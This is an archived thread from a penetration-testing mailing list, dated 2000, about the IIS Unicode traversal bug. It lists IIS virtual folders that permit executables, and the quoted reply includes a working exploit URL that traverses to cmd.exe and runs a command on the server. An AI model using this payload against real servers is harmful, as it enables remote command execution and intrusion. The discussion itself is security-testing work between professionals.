Penetration Testing mailing list archives

Re: [PEN-TEST] IIS UNICODE Strings

From: Daniel Docekal <ddoc () MIA CZ>
Date: Mon, 30 Oct 2000 22:24:45 +0100

Talking about W2K, there are MANY virtual folders located on system drive.

IISHELP (scripts only)
IISADMIN (scripts only)
MSADC (scripts and executables)  <--- this is problem
_vti_bin (scripts and executables) <--- another problem
PRINTERS (scripts only)

In case that Site Server is installed

SiteServer (scripts only)
Sites (scripts only)
_mem_bin (scripts and executables) <--- another problem
FpSample (scripts only)
CmSample (scripts only)

So, frankly said, we will always have Paris :)

-----Original Message-----
From: Michael Owen [mailto:mowen () COSTCO COM]
Sent: Monday, October 30, 2000 8:23 PM
To: PEN-TEST () SECURITYFOCUS COM
Subject: Re: [PEN-TEST] IIS UNICODE Strings


In our test, the InetPub directory is in logical drive D:
instead of default
C:.
Does that matter in the above examples?
-------------------------------------


In our internal tests, it does, and the exploit won't work.
BUT, if you use
the /msadc/ virtual folder, it won't matter, as msadc is in c:\program
files\Common\....


http://iisbox/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%
80\%af../winnt
/system32/cmd.exe\?/c\+dir+c:\\temp






----------------------------------
Michael Owen
Costco Wholesale
Network Security
(425) 313-2957

Current thread:

[PEN-TEST] IIS UNICODE Strings Mike Ahern (Oct 31)
- Re: [PEN-TEST] IIS UNICODE Strings Erick Arturo Perez Huemer (Oct 31)
- <Possible follow-ups>
- Re: [PEN-TEST] IIS UNICODE Strings Michael Owen (Oct 31)
- Re: [PEN-TEST] IIS UNICODE Strings Daniel Docekal (Oct 31)